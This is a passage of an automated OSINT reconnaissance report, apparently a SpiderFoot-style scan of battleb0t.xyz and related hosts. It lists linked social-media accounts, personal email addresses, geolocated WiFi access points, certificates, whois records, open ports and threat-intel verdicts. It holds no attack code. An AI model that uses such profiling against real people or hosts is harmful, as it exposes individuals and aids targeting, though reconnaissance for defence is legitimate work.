u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_ident | 185.199.110.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 7722 4671 (Net ID: 00:00:C5:FD:29:7C) | 41.8781, -87.6298 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | F3 (Category: social)
https://f3.cool/ayhu | ayhu |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Hubski (Category: social)
https://hubski.com/user/login | login |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.128): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:47:51 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 50, u'search_terms': [{u'id': u'host', u'value': u'185.199.110.153'}], u'result': [{u'environment_id': 160, u'job_id': u'645bd5b4c91b05fb4e09d1bc', u'analysis_start_time': u'2023-05-10 17:34:45', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'1eb54c8f8f093a5ed9d95a558ef3fba4478e0871baaaf09ed172f5a7e87a5b10', u'type': None, u'type_short': u'url', u'size': 43}, {u'environment_id': 160, u'job_id': u'645b7f631bddd658890d6f1f', u'analysis_start_time': u'2023-05-10 11:26:28', u'vx_family': None, u'av_detect': u'50', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'51c964dcceaa18cc88e308f2cdc2406b1d03555f03ddf2c95d28291be51ffade', u'type': None, u'type_short': u'url', u'size': 111}, {u'environment_id': 110, u'job_id': u'6455d656527d443ed60aa508', u'analysis_start_time': u'2023-05-06 04:23:51', u'vx_family': u'Phishing site', u'av_detect': u'58', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'b3c4f32bf311d95e65bd4f2f6ce93af614d560856d9425d0d4a555d75c3e9579', u'type': None, u'type_short': u'url', u'size': 59}, {u'environment_id': 160, u'job_id': u'64555682531d0684ae04bdd2', u'analysis_start_time': u'2023-05-05 19:18:27', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'bd60f020d50337e4d722a114e201e48bc6525e5b2e9c2b98216b38b585d8d843', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 160, u'job_id': u'64536cad0d5627815a06f833', u'analysis_start_time': u'2023-05-04 
08:28:30', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f6b87534e4ad728b3efdf794897f8badfaa12c074108bc1dc415c6a8c05a5221', u'type': None, u'type_short': u'url', u'size': 95}, {u'environment_id': 100, u'job_id': u'64515b3668c0c3e0390a7e86', u'analysis_start_time': u'2023-05-02 18:49:26', u'vx_family': u'Phishing site', u'av_detect': u'36', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'2f982f44961fc1f13e578da0cabe68a008733609fa9f04594128957a099ceed5', u'type': None, u'type_short': u'url', u'size': 97}, {u'environment_id': 110, u'job_id': u'64503df63e303ab74b0b9546', u'analysis_start_time': u'2023-05-01 22:32:22', u'vx_family': u'Win/grayware_confidence_60%', u'av_detect': u'21', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'Yuzu Updater.exe', u'sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'type': None, u'type_short': u'.NET exe', u'size': 102912}, {u'environment_id': 110, u'job_id': u'6449b9efc9475afa460684b1', u'analysis_start_time': u'2023-04-26 23:55:27', u'vx_family': u'Phishing site', u'av_detect': u'75', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'd4ecb5317b76cb50a2b081868ed27de654816aac4a50cf4f4b2ff50f3c12e98c', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 160, u'job_id': u'64490622595e26aaf70214c8', u'analysis_start_time': u'2023-04-26 11:08:19', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': 
u'0a8afa66a1f5a82193119c2336e31a594ba3098af7be2e4047d2e04beb5850d0', u'type': None, u'type_short': u'url', u'size': 444}, {u'environment_id': 110, u'job_id': u'6442db2eed6efbd2240f3754', u'analysis_start_time': u'2023-04-21 18:51:26', u'vx_family': u'Phishing site', u'av_detect': u'10', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'c476745cfb34866457803744a7898a71b4ea6fc620fac85ffed040d7012cb4b7', u'type': None, u'type_short': u'url', u'size': 48}, {u'environment_id': 110, u'job_id': u'643ddc4b41506c15bd0f0380', u'analysis_start_time': u'2023-04-17 23:54:52', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'cdea7744dbe76157c42918ca828871e1a1bc1e70b6cf161b54d04d946a300ca1', u'type': None, u'type_short': u'url', u'size': 64}, {u'environment_id': 110, u'job_id': u'643dda626eb15b91290fc514', u'analysis_start_time': u'2023-04-17 23:46:43', u'vx_family': None, u'av_detect': u'58', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'757fbd83c6b388685a77cdc9ebef01ecd96b3f02ad51cce5b704ff32e567de84', u'type': None, u'type_short': u'url', u'size': 60}, {u'environment_id': 110, u'job_id': u'643dda57f1d6c20c6901299f', u'analysis_start_time': u'2023-04-17 23:46:32', u'vx_family': None, u'av_detect': u'57', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'0636e0ae6696317893450396f0e7cc0c18fa85bf9428fcb5e30532541214906a', u'type': None, u'type_short': u'url', u'size': 76}, {u'environment_id': 160, u'job_id': u'64324ea527cf82106202bff7', u'analysis_start_time': u'2023-04-09 05:35:33', 
u'vx_family': u'Malicious site', u'av_detect': u'22', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'300e105cc83e64e1de3d1f59c835690b2605f445eaea4ac7eb06fa649d3cba32', u'type': None, u'type_short': u'url', u'size': 43}, {u'environment_id': 160, u'job_id': u'64303fbfcea4bd4a8f06a8f8', u'analysis_start_time': u'2023-04-07 16:07:27', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'c31707db3b8ad0e4c22e4c74983a89fc94d4cf95bcfafd48023deca7764128f0', u'type': None, u'type_short': u'url', u'size': 130}, {u'environment_id': 160, u'job_id': u'642f06b5743086351900d2a6', u'analysis_start_time': u'2023-04-06 17:51:49', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'c0cfc842ccbaa88ea6b6ae6bb9c24b87ca2e271b77c5350b7ee575b465019227', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 100, u'job_id': u'642ea6c82e1849181405e516', u'analysis_start_time': u'2023-04-06 11:02:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'171a6a53761331f106ebd53de3264163d02ef248497d89bdaa19f070dadf82a8', u'type': None, u'type_short': u'url', u'size': 715}, {u'environment_id': 100, u'job_id': u'642c5f7e039e817b2b0749ab', u'analysis_start_time': u'2023-04-04 17:33:51', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 39, u'verdict': u'suspicious', u'submit_name': u'scale.com', u'sha256': u'bff47563d9a757224cda0a4c90c7cc681d80107efa48891bdc347b062c44c0f5', u'type': None, u'type_short': u'html', u'size': 
141092}, {u'environment_id': 100, u'job_id': u'6427fd961f3f69ddbc0f9850', u'analysis_start_time': u'2023-04-01 09:47:03', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'877994c44f4f4b595fa650e1283efc786926c41b3a6af7fab62341b06a505a8e', u'type': None, u'type_short': u'url', u'size': 48}, {u'environment_id': 100, u'job_id': u'64246f1544fc23cd26095e6d', u'analysis_start_time': u'2023-03-29 17:02:14', u'vx_family': None, u'av_detect': u'33', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'3a72dd9862ff6d683301cce0cc36e72efb438d09893b8d9841a45a255e5f03c8', u'type': None, u'type_short': u'url', u'size': 50}, {u'environment_id': 100, u'job_id': u'64234220a560e4f7280e8a00', u'analysis_start_time': u'2023-03-28 19:38:09', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f84ebc72ffe159736478a6aedbe614098803356f6b69d19905bfc8de69549128', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 160, u'job_id': u'642262aa36c72290dd02ee4c', u'analysis_start_time': u'2023-03-28 03:44:43', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no verdict', u'submit_name': u'sample.url', u'sha256': u'14983e1667a00bda888756ec7ecf76fd29bb61ffb73d1ec8cf5669c6ee1258a4', u'type': None, u'type_short': u'url', u'size': 46}, {u'environment_id': 160, u'job_id': u'64200f6b03a47f3dff0fc492', u'analysis_start_time': u'2023-03-26 09:25:00', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', 
u'sha256': u'bbbceecc03231c0a6894d0366668ac0e4a0c84e8a2c04c6c0e01b3aa07d45ee7', u'type': None, u'type_short': u'url', u'size': 188}, {u'environment_id': 160, u'job_id': u'641d3af9995a9d9f980a0bd1', u'analysis_start_time': u'2023-03-24 05:54:02', u'vx_family': u'suspicious.low.ml', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspi | 185.199.110.153 |
| 2023-05-12 02:45:32 | Raw Data from RIRs | No | PhishStats | 0 | 0 | 2 | 0 | None | [{u'page_text': u' ', u'domain': None, u'virus_total': None, u'n_times_seen_ip': None, u'abuse_contact': None, u'ip': u'185.199.108.153', u'google_safebrowsing': None, u'threat_crowd': None, u'n_times_seen_domain': None, u'alexa_rank_host': None, u'id': 2237961, u'city': u'', u'abuse_ch_malware': None, u'countrycode': u'NL', u'title': u'Site not found \xb7 GitHub Pages', u'ssl_subject': None, u'technology': None, u'date_update': u'2020-12-08T01:50:24.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': None, u'vulns': None, u'latitude': u'52', u'regionname': u'', u'hash': u'6f8f0cfa616f90e680c4136030ab5e5904d3331895ffcc4f8c615128545a0da4', u'threat_crowd_subdomain_count': None, u'screenshot': None, u'n_times_seen_host': None, u'ssl_issuer': None, u'domain_registered_n_days_ago': None, u'regioncode': u'', u'host': u'swary.github.io', u'date': u'2018-05-25T15:15:02.000Z', u'asn': u'AS54113', u'tags': None, u'bgp': u'185.199.108.0/22', u'url': u'https://swary.github.io/wservvpro/', u'isp': u'FASTLY - Fastly, US', u'longitude': u'4.89950000', u'ports': None, u'countryname': u'Netherlands', u'threat_crowd_votes': None, u'http_server': None, u'tld': u'io', u'os': None, u'http_code': None}] | 185.199.108.153 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Trello (Category: social)
https://trello.com/_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:2D:BB:B4) | 34.0544, -118.244 |
| 2023-05-12 03:01:30 | Web Technology | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | HTML5 | nuke.battleb0t.xyz |
| 2023-05-12 02:50:44 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:03:e6:77:f0:fb:1d:de:0e:93:d2:d9:e5:40:98:fb:b1:42
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Nov 17 08:07:50 2022 GMT
Not After : Feb 15 08:07:49 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:b1:ca:c5:7f:45:88:ea:f6:98:9e:7e:93:33:29:
bd:74:fc:48:fe:29:e9:2a:62:8c:97:f1:93:16:6f:
19:da:24:7c:94:17:6e:35:5b:b2:ef:eb:77:ee:6f:
68:a3:10:bb:0d:f6:01:57:78:db:8f:85:23:65:1b:
8d:5a:d8:02:5e
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
26:F8:75:40:42:15:34:A1:4E:96:C0:96:27:7F:34:DA:52:69:CF:39
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
| battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0036labs.github.io | 185.199.111.153 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | GitHub (Category: coding)
https://github.com/Battleb0t | Battleb0t |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:64:E2:6A) | 50.1188, 8.6843 |
| 2023-05-12 02:44:05 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | None None | ayhu.xyz |
| 2023-05-12 02:53:32 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.111.153:443 | 185.199.111.153 |
| 2023-05-12 03:12:58 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 2 | 0 | None | OpenPhish [github.io]
https://www.openphish.com/feed.txt | github.io |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DPRWirelessScottsdale (Net ID: 00:02:6F:FD:3F:B2) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:07 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | Fastly | battleb0t.xyz |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2095 | 87.248.157.102 |
| 2023-05-12 03:16:26 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'16', u'country_tld': u'.tr', u'ip': u'87.248.157.102', u'currency_name': u'Lira', u'currency': u'TRY', u'country_population': 82319724, u'country_code': u'TR', u'timezone': u'Europe/Istanbul', u'city': u'Bursa', u'network': u'87.248.157.0/24', u'languages': u'tr-TR,ku,diq,az,av', u'version': u'IPv4', u'latitude': 40.2024, u'in_eu': False, u'utc_offset': u'+0300', u'continent_code': u'AS', u'country_name': u'Turkey', u'country_capital': u'Ankara', u'org': u'Dgn Teknoloji A.s.', u'postal': u'16350', u'asn': u'AS43260', u'country': u'TR', u'region': u'Bursa', u'longitude': 29.0398, u'country_calling_code': u'+90', u'country_area': 780580.0, u'country_code_iso3': u'TUR'} | 87.248.157.102 |
| 2023-05-12 02:44:18 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | 185.199.110.153 |
| 2023-05-12 03:01:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.133:443 | 185.199.110.0/24 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01-scripts.github.io] https://www.openphish.com/feed.txt | 01-scripts.github.io |
| 2023-05-12 02:45:04 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'2606:50c0:8000::153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'2606:50c0::/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2606:50c0:8000::153 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | F3 (Category: social) https://f3.cool/ayshoo | ayshoo |
| 2023-05-12 02:44:23 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-fastly-request-id: 88b13ec8ddf02c1379830d22f861ddb1826456ec | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:00:46 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.62): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.58): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 2159fc (Net ID: 00:02:2D:21:59:FC) | 34.0544, -118.244 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 172.67.135.9 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bowman's base (Net ID: 00:02:2D:21:D5:B7) | 34.0544, -118.244 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | madler@alumni.caltech.edu | |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_2.jpeg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | House (Net ID: 00:02:2D:09:FC:0D) | 37.780462,-122.390564 |
| 2023-05-12 03:00:59 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 3 | 0 | None | VXVault Malicious URL List [cdn-185-199-109-153.github.com] http://vxvault.net/URL_List.php | cdn-185-199-109-153.github.com |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 3 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 172.67.168.252 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.45): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F2:E2:35) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.246): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:25 | Internet Name | No | DNS Resolver | 1 | 0 | 2 | 0 | None | pics.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 16 00:40:11.019 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 16 00:40:11.009 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:55:01 | Netblock Membership | No | Censys | 347 | 0 | 2 | 0 | None | 188.114.96.0/24 | 188.114.96.1 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Periscope (Category: video) https://www.periscope.tv/ayhu | ayhu |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | CLKDevices (Net ID: 00:01:B2:39:20:00) | 37.7642, -122.3993 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | dinamo (Net ID: 00:02:CF:8C:8A:82) | 40.2024, 29.0398 |
| 2023-05-12 02:59:51 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | contact@ikerguerrero.dev | |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-served-by: cache-lga21982-LGA | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:11:20 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Frankfurt am Main', u'security': {u'is_vpn': False}, u'city_geoname_id': 2925533, u'region_geoname_id': 2905330, u'country': u'Germany', u'region': u'Hesse', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'DIGITALOCEAN-ASN', u'isp_name': u'DigitalOcean, LLC', u'organization_name': u'DigitalOcean, LLC', u'autonomous_system_number': 14061}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/DE_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/DE_flag.png', u'unicode': u'U+1F1E9 U+1F1EA', u'emoji': u'\U0001f1e9\U0001f1ea'}, u'postal_code': u'60313', u'longitude': 8.6843, u'country_code': u'DE', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Berlin', u'current_time': u'05:11:19'}, u'latitude': 50.1188, u'country_geoname_id': 2921044, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'165.232.113.85', u'continent': u'Europe', u'region_iso_code': u'HE'} | 165.232.113.85 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Calendy (Category: misc) https://calendly.com/ayhu | ayhu |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip (Net ID: 00:02:2D:03:87:91) | 37.7813933,-122.3918002 |
| 2023-05-12 03:17:34 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: AYSHU.XYZ
Registry Domain ID: D346635612-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: https://idwebhost.com
Updated Date: 2023-02-06T12:49:42.0Z
Creation Date: 2023-02-01T09:45:59.0Z
Registry Expiry Date: 2024-02-01T23:59:59.0Z
Registrar: CV Jogjacamp
Registrar IANA ID: 1478
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: cP Hosting World
Registrant State/Province: Bagerhat
Registrant Country: BD
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.CPHOSTINGWORLD.NET
Name Server: NS2.CPHOSTINGWORLD.NET
DNSSEC: unsigned
